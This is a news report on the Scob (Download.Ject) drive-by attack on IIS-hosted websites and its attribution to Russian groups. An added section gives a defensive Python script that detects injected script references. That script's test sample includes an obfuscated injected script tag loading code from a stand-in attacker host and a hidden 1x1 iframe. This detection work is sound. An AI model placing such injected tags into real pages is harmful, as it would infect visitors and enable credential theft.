UPDATE: Russian Virus Group Tied To Scob Attack

The Scob attack – code implanted into a number of popular Websites, reportedly including at least one as-yet unnamed auction site and several banking sites – has been tied by at least two major Internet security companies to the Russian virus-writing group known as Korgo. Law enforcement is also reportedly probing the group over the new attacks.

F-Secure antivirus research director Mikko Hypponen has told reporters his team spent most of the night examining Scob, enough to determine that the likely source was Korgo, which has hacked into the servers of major Internet providers hosting big sites and embedded the Scob code in the pages those servers deliver.

Graham Cluley, senior technology consultant for Sophos, has told reporters his team has also tied Scob to Korgo, though they have not yet been able to reach the Web addresses from which the program is downloaded.

When unsuspecting visitors reach the infected Websites, Scob directs their computers to Web addresses run by the hackers and lets the hackers install a Trojan horse on those computers, which then uses keystroke loggers to gather surfers' passwords, logins, PayPal payment data and other such information, Hypponen said at midday June 25.

Earlier on June 25, an undetermined number of Web surfers using Microsoft Internet Explorer picked up Scob, which was planted on the compromised sites through a flaw in Microsoft's IIS 5.0 Web server software. The Internet Storm Center at the SANS Institute, a collaboration between universities and private researchers, had as of this writing declined to list the sites it knew to be infected by Scob – also known as Download.Ject or Toofer – in order to prevent further abuse.

Early reporting suggested Scob's actual motive was to open yet another pathway for mass spammers, who have in the recent past been suspected of either writing and distributing their own such malware or partnering with virus writers – when not, as some reported, waging wars against each other.

"We won't list the sites that are reported to be infected in order to prevent further abuse," said an early Internet Storm Center announcement, "but the list is long and includes businesses that we presume would normally be keeping their sites fully patched."

Scob differs from viruses that travel by e-mail in that infection takes nothing more than visiting a compromised Website, and the visitor gets no indication that anything happened until the stolen data is misused, according to experts talking to the press within hours of the bug's appearance.

Scob opens a pathway for the installation of Trojans that carry anything from keystroke loggers and proxy servers to other backdoors. Sophos said within hours of Scob's full-fledged launch that Internet Explorer users visiting infected Websites would find their computers trying to download a file from a Website that had by then been identified and was suspected of being Russian in origin.

Hypponen also said the Web addresses where the stolen information is stored are not obvious, and that anyone trying to find them would have to reverse-engineer the code. But law enforcement authorities who were already probing Korgo have opened an investigation into the Scob attacks and are trying to shut down the addresses to which Scob's code directs visitors from the infected Websites.
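The mechanism described above is a site serving, without its operator's knowledge, code that sends visitors' browsers to a host the attackers control, with the address hidden from casual inspection. A site operator can check for that condition by comparing the HTML the server actually returns against an allow-list of the hosts the site legitimately loads code from. The script below is an added example written for this article; it is not code from F-Secure, Sophos, SANS or the article's author, and it does not reproduce the real Scob payload. The host names, page contents and allow-list are constructed placeholders, and the two decoders (for unescape() and String.fromCharCode() encodings) are an assumption about how such an address might be hidden, not a description of the actual obfuscation used.

```python
"""Check served HTML for injected references to outside hosts.

Added example for this article, not code from F-Secure, Sophos, SANS or
the article's author. It assumes the site operator can read the HTML the
server actually returns to visitors and keeps an allow-list of the hosts
the site legitimately loads code from. All host names, URLs and page
contents below are constructed for illustration.
"""
import re
from urllib.parse import unquote, urlparse

# Hosts this (hypothetical) site is expected to load script from.
ALLOWED_HOSTS = {"www.example-bank.test", "static.example-bank.test"}

# Elements whose src/data attribute makes the browser fetch and run or
# embed a remote resource: the hook a drive-by injection needs.
_REF_RE = re.compile(
    r"<(script|iframe|object|embed)\b[^>]*?\b(?:src|data)\s*=\s*['\"]?([^'\"\s>]+)",
    re.IGNORECASE,
)
# Two common ways of hiding a URL in page script: unescape("%3C...") and
# String.fromCharCode(60,115,...). These are an assumption about the form
# the hiding takes, not a description of the real payload.
_UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", re.IGNORECASE)
_FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([0-9,\s]+)\)", re.IGNORECASE)


def decode_obfuscated(text):
    """Replace unescape()/fromCharCode() payloads with their decoded text.

    Only %XX escapes are handled (urllib's unquote); JavaScript's %uXXXX
    form is left untouched.
    """
    text = _UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), text)
    text = _FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
        text,
    )
    return text


def find_external_refs(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (tag, url, host) for each remote code reference whose host is
    outside the allow-list. Relative URLs have no host and are same-origin,
    so they are ignored. Obfuscated payloads are decoded first so a script
    tag written via document.write(unescape(...)) is still seen."""
    findings = []
    for tag, url in _REF_RE.findall(decode_obfuscated(html)):
        host = urlparse(url).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append((tag.lower(), url, host.lower()))
    return findings


# Constructed sample: a normal page, then the same page with a footer
# appended that writes a hidden script tag and a 1x1 iframe.
CLEAN_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://static.example-bank.test/lib.js"></script>
</head><body>Welcome</body></html>"""

INJECTED_PAGE = CLEAN_PAGE + """
<script>document.write(unescape("%3Cscript src=%22http://attacker-host.test/x.js%22%3E%3C/script%3E"));</script>
<iframe src="http://203.0.113.5/ad.html" width=1 height=1></iframe>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, find_external_refs(page))
```

Run against the pages a server actually emits (fetched as a visitor would, not read from the document root, since server-side injection can append to every response without touching the files on disk), the check flags the constructed injected page's script and iframe while passing the clean page. A reference to an unfamiliar host is a lead to investigate, not proof of compromise, and the decoder covers only the two encodings it names.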

F-Secure said earlier on June 25 that Scob's downloader has been used to install variants of the Padolor backdoor, the brainchild of another Russian hacking group known as HangUp Team, which steals credit information, logins, passwords and other sensitive personal data. A variant known as Padolor.w was found early on June 25, as Scob began hitting the Web in earnest.